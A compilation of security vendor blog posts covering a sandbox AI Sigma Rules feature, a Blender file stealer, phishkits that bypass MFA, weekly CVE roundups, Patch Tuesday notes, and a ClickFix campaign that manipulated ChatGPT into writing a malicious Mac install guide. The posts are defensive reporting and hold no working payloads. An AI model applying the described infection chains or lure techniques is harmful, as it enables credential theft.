Security teams face thousands of alerts every single day. Many of them don’t clearly show whether there’s a true threat behind them. Investigation slows down, analysts lose time on low-value signals, and important findings are often buried in noise.
AI Sigma Rules change this routine. With this new capability in ANY.RUN’s Interactive Sandbox, SOC teams can not only see the source of malicious activity in the standard Sigma format but also use the generated rules across their entire environment. Every confirmed threat now actively improves how your SOC detects the next one and speeds up response.
The Challenge: From Alert Overload to Actionable Knowledge
Most SOCs struggle to turn threats they identify into reusable, scalable detection logic. The obstacles pile up quickly:
Hard to share knowledge: Insights often stay with the analyst who handled the case instead of becoming team-wide detection logic.
Manual rule creation: Turning attack behavior into a working rule takes time, testing, and trial-and-error.
Dependency on a few experts: Only senior engineers usually know how to write or adapt rules for each platform.
Slow improvement cycles: Even when analysts uncover something important, converting it into broader protection takes too long.
All of this results in the same issue: SOCs fix individual incidents, but the lessons don’t consistently carry over into stronger detection coverage.
How ANY.RUN Solves It with AI Sigma Rules
AI Sigma Rules displayed inside ANY.RUN sandbox
AI Sigma Rules automate one of the slowest and most error-prone parts of detection engineering: turning real attack behavior into usable detection logic.
Instead of manually translating sandbox findings into rules, teams receive a ready-to-review Sigma rule built directly from the recorded malicious activity.
Each rule is generated from what actually happened during execution; the same events, processes, and fields analysts already trust during investigation. As a result, the detection logic stays closely tied to real attacker behavior, not assumptions or static indicators.
With AI Sigma Rules, SOC teams can:
Understand the root cause of detections by seeing the exact events and fields that triggered them.
Leverage industry-standard threat descriptions for seamless integration with security workflows.
Deploy rules directly to SIEM, SOC, or EDR tools to strengthen defenses.
Accelerate incident response by reducing mean time to resolve (MTTR).
For security leaders, this changes the value of every investigation. A confirmed detection no longer ends with a closed alert but becomes a chance to strengthen the whole infrastructure.
Cut MTTR by 21 minutes and reduce MTTD to 60 sec Request trial of ANY.RUN’s Enterprise plan
Let’s take a closer look at how you can quickly get an actionable Sigma rule inside ANY.RUN’s Interactive Sandbox.
1. Submit a suspicious file or URL Run the sample in ANY.RUN’s Interactive Sandbox to observe its behavior in real time.
Settings for malware analysis session with uploaded sample
2. Wait for a detection to trigger As soon as malicious activity is confirmed, the sandbox highlights the event and prepares the data behind it.
The process of analyzing malicious sample inside ANY.RUN’s sandbox
3. Open the AI Sigma Rules panel Inside the detection view, you’ll see a generated Sigma rule that reflects the exact logic behind the alert, including key event fields and matching conditions.
AI Sigma Rules panel with the rules generated by ANY.RUN sandbox
4. Copy or export the rule for deployment Use it as a correlation rule, hunting query, or alert in your SIEM, EDR, or other detection layers. From there, analysts can fine-tune and activate the rule in minutes.
AI Sigma Rules ready for exporting
This creates a short, repeatable path that lets SOCs like yours detect this malicious pattern every time it pops up.
How AI Sigma Rules Benefit SOC Teams
AI Sigma Rules change how SOC teams scale what they learn from real attacks. Here’s how that impact shows up in day-to-day operations:
Reduce MTTR: Cut the time from first detection to live rule by giving analysts a ready Sigma rule instead of a blank page. Minimize the investigation and handover time because the logic behind the alert is already clear and reviewable.
Increase detection coverage: Expand protection by turning every important detection into a reusable Sigma rule that can run across your SIEM, EDR, and other tools. Close more gaps, faster, with behavior-based rules tied to real attacks your team has seen.
Boost analyst throughput: Free analysts from low‑value rule drafting by auto generating the first version of each rule. Let them focus on validation, tuning, and decisions rather than copy paste work. Result: less routine work, fewer errors, higher decision speed.
Strengthen MSSP offerings: Scale one investigation into protection for many tenants by reusing the same Sigma rules. Show customers and auditors clear, transparent logic that proves how your SOC turns incidents into durable detections.
Raise Enterprise SOC maturity: Unify detection language across Tier 1, 2, and 3 with a shared Sigma format. Make it easier to share rules, onboard new analysts, and review what really protects the business, not just what generated tickets.
Try AI Sigma Rules in Your SOC
AI Sigma Rules are now part of the ANY.RUN Sandbox Enterprise plan, giving teams a faster way to turn real threats into live detection logic.
Want to see how much time it can save your analysts?
Request a demo and walk through the workflow with our experts.
Conclusion
With AI Sigma Rules, SOCs no longer lose valuable insights to case notes or fragmented tooling. Every confirmed threat becomes an opportunity to strengthen the entire detection stack. As attackers evolve and environments grow more complex, this ability to turn daily investigations into continuous improvement becomes a real advantage. ANY.RUN brings that capability directly into the analyst workflow, making better detection not just possible, but repeatable.
About ANY.RUN
ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams investigate threats faster and make more confident decisions. Used by over 15,000 organizations and 500,000 analystsworldwide, the service combines real-time sandbox analysis with actionable threat intelligence to support daily SOC operations.
With features like interactive malware execution, automated detections, threat intelligence lookup, and now AI Sigma Rules, ANY.RUN enables teams to move from investigation to prevention with greater speed and clarity. It supports Windows, Linux, and Android environments and integrates seamlessly into modern security stacks.
Interpreting the vast cybersecurity vendor landscape through the lens of industry analysts and testing authorities can immensely enhance your cyber-resilience.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-12-11 06:06:412025-12-11 06:06:41Seeking symmetry during ATT&CK® season: How to harness today’s diverse analyst and tester landscape to paint a security masterpiece
News outlets recently reported that a threat actor was spreading an infostealer through free 3D model files for the Blender software. This is troubling enough on its own, but it highlights an even more serious problem: the business threat posed by free open source programs, uncontrolled by corporate infosec teams. And the danger comes not from vulnerabilities in the software, but from its very own standard features.
Why Blender and 3D model marketplaces pose a risk
Blender is a 3D graphics and animation suite used by visualization professionals across various industries. The software is free and open-source, and offers extensive functionality. Among Blender’s capabilities is support for executing Python scripts, which are used to automate tasks and add new features.
The package allows users to import external files from specialized marketplaces like CGTrader or Sketchfab. These platforms host both paid and free 3D models by artists and studios. Any of these model files potentially contain Python scripts.
This creates a concerning scenario: marketplaces where files can be uploaded by any user and may not be scanned for malicious content, combined with software that has an Auto Run Python Scripts feature. It allows files to automatically execute embedded Python scripts immediately upon opening — essentially running arbitrary code on the user’s computer in unattended mode.
How the StealC V2 infostealer spread via Blender files
The attackers posted free 3D models with the .blend file name extension on the popular CGTrader platform. These files contained a malicious Python script. If the user had the Auto Run Python Scripts feature enabled, downloading and opening the file in Blender triggered the script. It then established a connection to a remote server and downloaded a malware loader from the Cloudflare Workers domain.
The loader executed a PowerShell script, which in turn downloaded additional malicious payloads from the attackers’ servers. Ultimately, the victim’s computer was infected with the StealC infostealer, enabling the attackers to:
Extract data from over 23 browsers.
Harvest information from more than 100 browser extensions and 15 crypto wallet applications.
Steal data from Telegram, Discord, Tox, Pidgin, ProtonVPN, OpenVPN, and email clients like Thunderbird.
Use a User Account Control (UAC) bypass.
The danger of unmonitored work tools
The problem isn’t Blender itself — threat actors will inevitably try to exploit automation features in any popular software. Most end-users don’t consider the risks of enabling common automation features, nor do they typically dive deep into how these features work or how they could be exploited.
The core issue is that security teams aren’t always familiar with the capabilities of specialized tools used by various departments. They simply don’t account for this vector in their threat models.
How to avoid becoming a victim
If your company uses Blender, the first step is to disable the automatic execution of Python scripts (Auto Run Python Scripts feature). Here’s how to do it according to official documentation.
How to disable the automatic execution of Python scripts in Blender. Source
Furthermore, to prevent the sudden spread of threats via work tools, we recommend that corporate security teams:
Prohibit the use of tools and extensions that haven’t been approved by the security team.
Thoroughly vet permitted software, and assess risks before implementing any new services or platforms.
Regularly train employees to recognize the risks associated with installing unknown software and using dangerous features. You can automate security awareness training with the Kaspersky Automated Security Awareness Platform.
Enforce the use of secure configurations for all work tools.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-12-10 18:06:462025-12-10 18:06:46A stealer hiding in Blender 3D models | Kaspersky official blog
Phishing used to be easy to spot. Now it looks clean, trusted, and almost perfect. Behind it are phishkits; ready-made attack platforms built to steal credentials, bypass MFA, and hijack live sessions in seconds.
For SOC teams, one click starts the countdown. What looks like a routine alert can already be a live account takeover.
Here’s how these attacks actually work, and how advanced SOC teams catch them before they spread.
What Is a Phishing kit?
A phishing kit, aka phishkit, is a ready-made toolkit that attackers use to launch phishing campaigns fast and at scale. Instead of building fake pages and infrastructure from scratch, they buy or rent a kit and deploy a full attack setup in minutes.
Most phishkits come with:
Fake login pages for popular services
Reverse proxy scripts to quietly intercept traffic
Built-in MFA bypass
Admin panels for harvesting credentials
Tools to filter out bots and security scanners
What makes phishkits especially dangerous is how little skill they now require. Even low-experience attackers can run advanced phishing operations using these packaged platforms; with the infrastructure, automation, and data collection already built in.
Example of a Greatness phishkit attack analyzed in ANY.RUN’s Interactive Sandbox
Detecting phishkits early comes down to understanding what happens after the click. With an interactive sandbox like ANY.RUN, analysts can safely open suspicious links, interact with phishing pages like a real user, and observe the full execution chain as it unfolds. This makes it possible to expose reverse proxy behavior, MFA capture, and credential theft in real time, often within seconds.
Detect phishing threats in under 60 seconds Integrate ANY.RUN’s Sandbox in your SOC
Phishkits quietly remove the barriers that businesses rely on for protection. By sitting between the employee and the real service, these tools capture logins, MFA codes, and active sessions in real time. The result is immediate, legitimate-looking access to corporate systems.
Once attackers get inside, the impact spreads fast. A single compromised account can open access to email threads, internal tools, cloud platforms, customer data, and even financial systems. From there, attackers blend in, send messages from trusted inboxes, reset passwords, and move deeper without triggering obvious alarms.
What makes phishkits especially dangerous is how clean the entry point often looks. There’s no malware dropped right away or a suspicious attachment. Just a normal login that isn’t normal at all. This makes early detection hard and gives attackers valuable time to act before security teams even realize something is wrong.
For businesses, phishkits often lead to:
Silent data leaks from email, cloud apps, and internal systems
Business disruption caused by locked accounts and broken workflows
Direct financial losses from fraud and unauthorized transactions
Follow-up attacks launched from trusted employee inboxes
Long investigations and recovery efforts that stretch on for weeks
Reputational damage and loss of customer trust
Key Detection Challenges for SOC Teams
Challenge
What It Looks Like in Practice
Why It’s a Problem
Clean phishing emails
Messages pass basic filters and look legitimate
No early warning at the email layer
Reverse proxy behavior
Users log in through a live proxy
Logs show a “normal” successful login
Short-lived domains
Phishing domains disappear quickly
Blocklists don’t update in time
Valid credentials & sessions
Attackers use real usernames, passwords, and MFA
No brute-force or obvious abuse signals
No malware at first stage
No attachment, no payload, just a web login
File-based detection is bypassed
Rapid attacker response
Access is used seconds after credentials are stolen
SOC has almost no reaction window
How SOC Teams Can Detect Phishkit Attacks Faster
Speed matters with phishkits. The sooner a team can see the full phishing chain in action, the sooner they can contain access, block infrastructure, and stop the same kit from hitting more users. A fast investigation comes from combining interactive sandboxing with real-time threat intelligence.
Step 1: Send suspicious links straight to the sandbox
Instead of only blocking the URL, run it in an isolated environment to see what actually happens after the click, redirects, proxy behavior, and the final phishing page.
Suspicious link ready for sandbox analysis
Step 2: Interact with the page like a real user
Phishkits stay quiet until someone behaves like a victim. Clicking buttons, entering test credentials, and moving through the flow helps trigger session theft, MFA capture, and hidden scripts.
Step 3: Watch the full chain unfold in real time
A live sandbox session shows every redirect, outbound connection, script call, and credential capture attempt, not just the final page.
Full attack chain with EvilProxy and Tycoon 2FA exposed in 40 seconds inside ANY.RUN sandbox
Step 4: Pull fresh IOCs as the attack runs
Domains, IPs, URLs, scripts, and proxy infrastructure can be extracted immediately and pushed into blocking rules and hunting queries.
Relevant IOCs automatically collected in one tab inside ANY.RUN sandbox
Step 5: Enrich indicators with TI Lookup
With ANY.RUN TI Lookup, analysts can instantly check whether the same domains, IPs, scripts, or redirect patterns were seen in past phishing or malware campaigns. This helps confirm phishkit families and link related activities.
Recent Tycoon 2FA analysis sessions found with the help of TI Lookup
Using indicators from both the sandbox and TI Lookup, teams can quickly:
Identify related infrastructure across past and current cases
Detect active waves using the same phishkit
Validate whether a campaign is isolated or part of a larger operation
Collect intelligence on phishkit attacks with ANY.RUN’s TI Lookup
This workflow turns phishing from a slow, reactive task into a fast, repeatable investigation process, with confirmation in minutes.
Step 6: Track new infrastructure with Threat Intelligence Feeds
TI Feeds enriched with fresh data from 15.000 SOCs worldwide
ANY.RUN’s Threat Intelligence Feeds deliver fresh, actionable indicators of compromise (IOCs) sourced directly from live attack data across 15,000 SOCs, ensuring your security infrastructure stays ahead of emerging threats.
With only 1% overlap with other sources, your team gains access to previously undiscovered threat intelligence that competitors miss. Every IOC comes enriched with detailed sandbox reports and contextual metadata, providing the forensic depth needed for rapid incident response and threat hunting. Real-time updates deliver a live view of the threat landscape as attacks unfold, enabling proactive defense before threats reach your perimeter.
Integration is seamless. TI Feeds connects directly to your existing SIEM, TIP, and SOAR platforms via popular standards (STIX/TAXII) or through dedicated API and SDK, minimizing implementation overhead while maximizing threat coverage across your entire security stack.
Expand threat coverage in your SOC Rely on 99% unique IOCs from TI Feeds
Real Phishkit Examples Analyzed inside the ANY.RUN Sandbox
The following examples come from real attacks and show how different phishkits operate in live environments:
TyKit: A Multi-Stage Microsoft 365 Phishkit in Action
TyKit is a multi-stage phishing kit built to steal Microsoft 365 credentials at scale. It spreads through malicious SVG files that silently redirect victims to fake login pages protected by CAPTCHA and anti-bot checks. Once credentials are entered, they’re sent straight to the attackers through a structured C2 API.
The kit has been active since at least mid-2025 and has targeted organizations across finance, IT, government, telecom, and professional services worldwide. Its strength is simplicity: clean delivery, fast credential theft, and infrastructure that’s easy to rotate.
TyKit shows how modern phishkits don’t need malware to succeed, just one clean login flow is enough.
Tycoon 2FA: A Phishkit Built to Bypass MFA
Tycoon 2FA is a phishing-as-a-service platform designed to steal Microsoft 365 and Gmail accounts even when MFA is enabled. It works as an adversary-in-the-middle (AiTM) kit, using a reverse proxy to capture credentials, MFA codes, and active session cookies in real time.
What sets Tycoon 2FA apart is its constant evasion upgrades. Over time, it has added:
Rotating CAPTCHA systems
Browser and sandbox fingerprinting
Multi-layer obfuscation (Base64, XOR, AES)
Fake 404 pages and legitimacy checks
Long redirect chains to hide the true entry point
Once access is captured, attackers log in using a fully valid session. From a SOC view, it often looks like a normal user login until damage is already unfolding.
Mamba2FA: A Persistent Corporate Phishkit
Mamba2FA is a widely used phishkit built to steal corporate credentials, with repeated campaigns observed against organizations in the finance and manufacturing sectors. Like TyKit and Tycoon, it relies on clean phishing flows, fast infrastructure rotation, and live credential capture to move quickly before defenders can react.
What makes Mamba2FA especially useful as an example is how clearly it shows the value of tracking phishkits as ongoing campaigns, not one-off incidents. If your organization has already encountered a specific kit, the worst mistake is treating it as “closed.”
TI Lookup provides a wealth of threat data on phishing kit attacks
This immediately reveals both new attacks and network indicators observed during live sandbox analysis.
Instead of chasing isolated alerts, this approach turns phishkits like Mamba2FA into continuously monitored threats, making it much easier to spot repeat campaigns early and shut them down faster.
Phishkit Evolution: Hybrid Threats
Phishkits are no longer operating in isolation. One of the most worrying shifts is the rise of hybrid phishing chains, where multiple kits are combined into a single attack. These blended campaigns mix different infrastructures, redirect logic, and credential-theft methods to make detection and attribution far more difficult.
In recent enterprise-focused attacks, analysts have observed Tycoon 2FA and Salty working together in the same chain. One kit handles the initial lure and proxying, while the other takes over at later stages for credential capture, session hijacking, or follow-up delivery. For SOC teams, this breaks many traditional assumptions about how a “single” phishing campaign should look.
Hybrid attack with Salty and Tycoon detected inside ANY.RUN sandbox in just 35 seconds
Hybrid chains create several challenges at once:
Indicators belong to different kits, not just one
Redirect paths change mid-attack
Infrastructure overlaps across separate actor groups
Detection rules based on one kit alone often miss the full picture
This evolution shows where phishing is heading: modular, flexible attack chains built from multiple commercial kits. For defenders, that means investigations must focus on behavior and execution flow, not just kit names or static indicators.
Key Takeaways for SOC Readiness in 2026
Phishkits now shape how real-world phishing attacks are built, delivered, and scaled against organizations.
Phishing is now a real-time intrusion, not just a user mistake. Once a link is clicked, the compromise may already be underway.
MFA alone is no longer enough: Session hijacking turns traditional MFA into a speed bump, not a barrier.
Hybrid phishing chains are becoming common: When multiple kits are combined in one attack, single-family detections fall short.
Behavior matters more than static indicators: Clean emails, short-lived domains, and valid sessions leave very little to flag at first glance.
Speed defines outcome: Minutes often decide whether an incident stays contained or escalates.
Evasion must be assumed by default: CAPTCHA abuse, fingerprinting, layered redirects, and sandbox checks are now standard tactics.
See It for Yourself
Phishkits behave very differently from what logs alone can show. A live run-through exposes even the most complex phishing chains, from redirects and proxy logic to live credential theft, often within the first 60 seconds of analysis in over 90% of cases. That speed alone can cut investigation time dramatically and help teams act before access spreads.
ANY.RUN supports more than 15,000 organizations worldwide, including leaders in finance, healthcare, telecom, retail, and tech, helping them strengthen security operations and respond to threats with greater confidence.
Designed for speed and visibility, the solution blends interactive malware analysis with live threat intelligence, giving SOC teams instant insight into attack behavior and the context needed to act faster.
By integrating ANY.RUN’s Threat Intelligence suite into your existing workflows, you can accelerate investigations, minimize breach impact, and build lasting resilience against evolving threats.
Frequently Asked Questions (FAQ)
How is a phishkit different from regular phishing?
Traditional phishing often just steals usernames and passwords. Phishkits go much further. They can: – Intercept live sessions – Bypass MFA in real time – Rotate domains automatically – Filter out bots and security scanners This turns phishing into a full attack platform, not just a fake page.
Can phishkits bypass MFA?
Yes. Many modern phishkits use adversary-in-the-middle (AiTM) techniques through reverse proxies. They capture credentials, MFA codes, and session cookies at the same time. Attackers then reuse the stolen session to log in without triggering MFA again.
Do phishkit attacks use malware?
Often, no. Many phishkit campaigns start with no malware at all. The compromise happens entirely through web-based credential theft. Malware may appear later for persistence or lateral movement, but the initial access is usually “clean.”
What are the most common signs of a phishkit attack?
Early warning signs may include unusual redirect chains before a login page appears, very short-lived phishing domains, CAPTCHA on unexpected login flows, new mailbox forwarding rules, or login activity from unfamiliar locations immediately after authentication.
Is blocking phishing domains enough to stop phishkits?
No. Domain blocking alone is not enough because phishing domains rotate quickly, redirect chains change constantly, and infrastructure is reused across campaigns. Behavioral detection and live analysis are now essential.
Will phishing get worse with phishkits in 2026?
Yes. Phishkits are becoming more automated, more modular, harder to attribute, and better at evading scanners and sandboxes. Hybrid chains that combine multiple phishkits in one attack are already becoming common.
What is the best long-term defense against phishkit attacks?
A strong long-term defense combines phishing-resistant MFA such as FIDO2 or certificate-based authentication, live sandbox analysis, continuous IOC enrichment, threat intelligence feeds, and SOC playbooks built around behavioraldetection. Because phishkits evolve constantly, defense must be continuous; not one-time.
Cyble Vulnerability Intelligence researchers tracked 591 vulnerabilities in the last week, and more than 30 already have a publicly available Proof-of-Concept (PoC), significantly increasing the likelihood of real-world attacks on those vulnerabilities.
A total of 69 vulnerabilities were rated as critical under the CVSS v3.1 scoring system, while 26 received a critical severity rating based on the newer CVSS v4.0 scoring system.
Here are some of the more critical IT and ICS vulnerabilities flagged by Cyble in recent reports to clients.
The Week’s Top IT Vulnerabilities
CVE-2025-60854 is a critical command injection vulnerability found in the D-Link R15 (AX1500) router firmware 1.20.01 and below. The flaw has a severity score of 9.8 and requires no authentication or user interaction to exploit, making it highly dangerous for affected systems.
CISA added five vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog in the last week:
CVE-2025-55182 is a critical pre-authentication remote code execution (RCE) vulnerability in React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0, including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The vulnerability has been reportedly targeted by China-linked threat groups.
CVE-2021-26829 is a cross-site scripting (XSS) vulnerability affecting OpenPLC ScadaBR that was targeted in recent attacks by the pro-Russian hacktivist group TwoNet on a honeypot simulating a water treatment facility, where the threat actors used default credentials for initial access, exploited the flaw to deface the HMI login page, and disabled logs and alarms in a little more than a day.
Five days after adding CVE-2021-26829 to the KEV catalog, CISA added CVE-2021-26828, a high-severity Unrestricted Upload of File with Dangerous Type vulnerability affecting OpenPLC ScadaBR through 0.9.1 on Linux and through 1.12.4 on Windows. The flaw could allow remote authenticated users to upload and execute arbitrary JSP files via view_edit.shtm.
CISA also added two Android vulnerabilities to the KEV catalog, both high-severity Android framework vulnerabilities. CVE-2025-48572 is a Privilege Escalation vulnerability, while CVE-2025-48633 is an Information Disclosure vulnerability. Neither vulnerability has been added to the National Vulnerability Database (NVD) yet.
Notable vulnerabilities discussed in open-source communities included:
CVE-2025-13223, a type confusion vulnerability in Google Chrome‘s V8 JavaScript and WebAssembly engine, allowing remote attackers to exploit heap corruption via a crafted HTML page, potentially leading to arbitrary code execution.
CVE-2025-11001, a directory traversal remote code execution vulnerability in 7-Zip, stemming from improper handling of symbolic links in ZIP files, potentially allowing attackers to escape extraction directories and execute arbitrary code in the context of a service account upon user interaction with crafted archives.
CVE-2025-58034, an OS command injection vulnerability in Fortinet FortiWeb web application firewalls.
CVE-2025-41115, a critical privilege escalation and user impersonation vulnerability in Grafana Enterprise’s SCIM provisioning feature, which could allow attackers to create accounts impersonating privileged users, modify dashboards, access databases, alter alerts, and pivot to connected systems.
CVE-2025-59366, a critical authentication bypass vulnerability in ASUS AiCloud routers, potentially allowing unauthorized execution of specific router functions via path traversal and OS command injection.
Vulnerabilities Under Discussion on the Dark Web
Cyble dark web researchers observed multiple threat actors (TA) on dark web and cybercrime forums discussing various exploits and weaponizing multiple vulnerabilities, including:
CVE-2025-60709: A Windows Common Log File System (CLFS) Driver elevation of privilege vulnerability that could allow an authorized attacker to elevate privileges locally through an out-of-bounds read flaw. The specific flaw exists within the clfs.sys driver and results from improper validation of user-supplied data, which can lead to a read past the end of an allocated memory region.
Local attackers can disclose sensitive information on affected Microsoft Windows installations and potentially exploit this vulnerability in conjunction with other vulnerabilities to execute arbitrary code in the context of the kernel, resulting in privilege escalation.
CVE-2025-5931: A high-severity privilege escalation vulnerability in the Dokan Pro WordPress plugin, which stems from improper user identity validation during the staff password reset procedure, allowing attackers with vendor-level access to escalate their privileges to staff member level and then change arbitrary user passwords, including those of administrators, potentially leading to a full account takeover.
CVE-2025-64446: A critical unauthenticated path traversal vulnerability in Fortinet FortiWeb WAF that could allow full administrative compromise of affected appliances via crafted HTTP(S) requests. The flaw is a relative path traversal (sometimes called “path confusion”) issue in the FortiWeb GUI / management API that could let an attacker reach an internal CGI handler and execute privileged operations without valid credentials. In practice, this becomes an authentication bypass that enables remote admin‑level control and, effectively, remote code execution on the WAF.
ICS Vulnerabilities
In addition to the OpenPLC ScadaBR vulnerabilities noted by CISA, Cyble threat intelligence researchers flagged four additional industrial control system (ICS) vulnerabilities in recent reports to clients.
CVE-2024-3871 is a critical Stack-Based Buffer Overflow vulnerability affecting Emerson Appleton UPSMON-PRO, versions 2.6 and prior. Successful exploitation of the vulnerability could allow remote attackers to execute arbitrary code on affected installations of Appleton UPSMON-PRO.
CVE-2025-13483 is a Missing Authentication for Critical Function vulnerability affecting SiRcom SMART Alert (SiSA), version 3.0.48. Successful exploitation of the vulnerability could enable an attacker to remotely activate or manipulate emergency sirens.
CVE-2025-13658 is a Command Injection vulnerability affecting Longwatch versions 6.309 to 6.334. Successful exploitation could allow an unauthenticated attacker to gain remote code execution with elevated privileges.
CVE-2025-13510 is a Missing Authentication for Critical Function vulnerability affecting Iskra iHUB and iHUB Lite, all versions. Successful exploitation could allow a remote attacker to reconfigure devices, update firmware, and manipulate connected systems without any credentials.
Conclusion
The wide range of critical and exploited vulnerabilities in this week’s report highlights the breadth of threats faced by security teams, who must respond with rapid, well-targeted actions to successfully defend IT and critical infrastructure. A risk-based vulnerability management program should be at the heart of those defensive efforts.
Other cybersecurity best practices that can help guard against a wide range of threats include segmentation of critical assets; removing or protecting web-facing assets; Zero-Trust access principles; ransomware-resistant backups; hardened endpoints, infrastructure, and configurations; network, endpoint, and cloud monitoring; and well-rehearsed incident response plans.
Cyble’s comprehensive attack surface management solutions can help by scanning network and cloud assets for exposures and prioritizing fixes, in addition to monitoring for leaked credentials and other early warning signs of major cyberattacks.
The Patch Tuesday for December of 2025 includes 57 vulnerabilities, including two that Microsoft marked as “critical.” The remaining vulnerabilities listed are classified as “important.” Microsoft assessed that exploitation of the two “critical” vulnerabilities is “less likely.”
CVE‑2025‑62562 is a Microsoft Outlook remote code execution vulnerability. Although it involves a use after free in Microsoft Office Outlook to allow an unauthorized attacker to execute code locally, an attacker would still need to send a malicious email and persuade the user to reply to it for the exploit to work.
CVE-2025-62553, CVE-2025-62554, CVE-2025-62556 and CVE-2025-62557 are Microsoft Office Remote Code Execution Vulnerability. An attacker can access resources using incompatible type (‘type confusion’) or use after free or untrusted pointer dereference in Microsoft Office allows an unauthorized attacker to execute code locally. Despite some of them being considered “critical”, the successful exploitation of this vulnerability requires an attacker to execute exploit code from the local machine to exploit the vulnerability.
CVE-2025-62456 is a Remote Code Execution Vulnerability in Windows Resilient File System (ReFS). The vulnerability is based on heap-based buffer overflow in Windows Resilient File System (ReFS) that allows an authorized attacker to execute code over a network. Although the vulnerability has high CVSS scores, Microsoft has assessed that this exploitation in the wild is unlikely.
CVE-2025-62549 – Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability. An attacker could exploit this vulnerability by deceiving a user to send a request to a malicious server. The malicious server could then respond with crafted data that may lead to arbitrary code execution on the user’s system. However, exploitation of this vulnerability requires user interaction, meaning the attacker must wait for the user to initiate a connection to the malicious server set up by the attacker before the exploit can occur. This dependency on user action increases the complexity of a successful attack.
CVE‑2025‑62565 and CVE‑2025‑64661 are Windows Shell elevation‑of‑privilege vulnerabilities. They involve issues such as use after free or concurrent execution using shared resources with improper synchronization (‘race condition’) in Windows Shell which could allow a local authorized attacker to gain higher privileges on the system.
Cisco Talos would also like to highlight several vulnerabilities that are only rated as “important,” but Microsoft lists as “more likely” to be exploited:
CVE-2025-62454 – Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
CVE-2025-62458 – Win32k Elevation of Privilege Vulnerability
CVE-2025-62470 – Windows Common Log File System Driver Elevation of Privilege Vulnerability
CVE-2025-62472 – Windows Remote Access Connection Manager Elevation of Privilege Vulnerability
CVE-2025-62221 – Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page. In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
The rules included in this release that protect against the exploitation of many of these vulnerabilities are: 62486, 62487, 65555-65562, 65571-65574. There are also these Snort 3 rules: 300719, 301351-301354, 301356, 301357.
https://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.png00adminhttps://www.backbox.org/wp-content/uploads/2018/09/website_backbox_text_black.pngadmin2025-12-10 00:06:382025-12-10 00:06:38Microsoft Patch Tuesday for December 2025 — Snort rules and prominent vulnerabilities
Infostealers — malware that steals passwords, cookies, documents, and/or other valuable data from computers — have become 2025’s fastest-growing cyberthreat. This is a critical problem for all operating systems and all regions. To spread their infection, criminals use every possible trick to use as bait. Unsurprisingly, AI tools have become one of their favorite luring mechanisms this year. In a new campaign discovered by Kaspersky experts, the attackers steer their victims to a website that supposedly contains user guides for installing OpenAI’s new Atlas browser for macOS. What makes the attack so convincing is that the bait link leads to… the official ChatGPT website! But how?
The bait-link in search results
To attract victims, the malicious actors place paid search ads on Google. If you try to search for “chatgpt atlas”, the very first sponsored link could be a site whose full address isn’t visible in the ad, but is clearly located on the chatgpt.com domain.
The page title in the ad listing is also what you’d expect: “ChatGPT™ Atlas for macOS – Download ChatGPT Atlas for Mac”. And a user wanting to download the new browser could very well click that link.
A sponsored link in Google search results leads to a malware installation guide disguised as ChatGPT Atlas for macOS and hosted on the official ChatGPT site. How can that be?
The Trap
Clicking the ad does indeed open chatgpt.com, and the victim sees a brief installation guide for the “Atlas browser”. The careful user will immediately realize this is simply some anonymous visitor’s conversation with ChatGPT, which the author made public using the Share feature. Links to shared chats begin with chatgpt.com/share/. In fact, it’s clearly stated right above the chat: “This is a copy of a conversation between ChatGPT & anonymous”.
However, a less careful or just less AI-savvy visitor might take the guide at face value — especially since it’s neatly formatted and published on a trustworthy-looking site.
Variants of this technique have been seen before — attackers have abused other services that allow sharing content on their own domains: malicious documents in Dropbox, phishing in Google Docs, malware in unpublished comments on GitHub and GitLab, crypto traps in Google Forms, and more. And now you can also share a chat with an AI assistant, and the link to it will lead to the chatbot’s official website.
Notably, the malicious actors used prompt engineering to get ChatGPT to produce the exact guide they needed, and were then able to clean up their preceding dialog to avoid raising suspicion.
The installation guide for the supposed Atlas for macOS is merely a shared chat between an anonymous user and ChatGPT in which the attackers, through crafted prompts, forced the chatbot to produce the desired result and then sanitized the dialog
The infection
To install the “Atlas browser”, users are instructed to copy a single line of code from the chat, open Terminal on their Macs, paste and execute the command, and then grant all required permissions.
The specified command essentially downloads a malicious script from a suspicious server, atlas-extension{.}com, and immediately runs it on the computer. We’re dealing with a variation of the ClickFix attack. Typically, scammers suggest “recipes” like these for passing CAPTCHA, but here we have steps to install a browser. The core trick, however, is the same: the user is prompted to manually run a shell command that downloads and executes code from an external source. Many already know not to run files downloaded from shady sources, but this doesn’t look like launching a file.
When run, the script asks the user for their system password and checks if the combination of “current username + password” is valid for running system commands. If the entered data is incorrect, the prompt repeats indefinitely. If the user enters the correct password, the script downloads the malware and uses the provided credentials to install and launch it.
The infostealer and the backdoor
If the user falls for the ruse, a common infostealer known as AMOS (Atomic macOS Stealer) will launch on their computer. AMOS is capable of collecting a wide range of potentially valuable data: passwords, cookies, and other information from Chrome, Firefox, and other browser profiles; data from crypto wallets like Electrum, Coinomi, and Exodus; and information from applications like Telegram Desktop and OpenVPN Connect. Additionally, AMOS steals files with extensions TXT, PDF, and DOCX from the Desktop, Documents, and Downloads folders, as well as files from the Notes application’s media storage folder. The infostealer packages all this data and sends it to the attackers’ server.
The cherry on top is that the stealer installs a backdoor, and configures it to launch automatically upon system reboot. The backdoor essentially replicates AMOS’s functionality, while providing the attackers with the capability of remotely controlling the victim’s computer.
How to protect yourself from AMOS and other malware in AI chats
This wave of new AI tools allows attackers to repackage old tricks and target users who are curious about the new technology but don’t yet have extensive experience interacting with large language models.
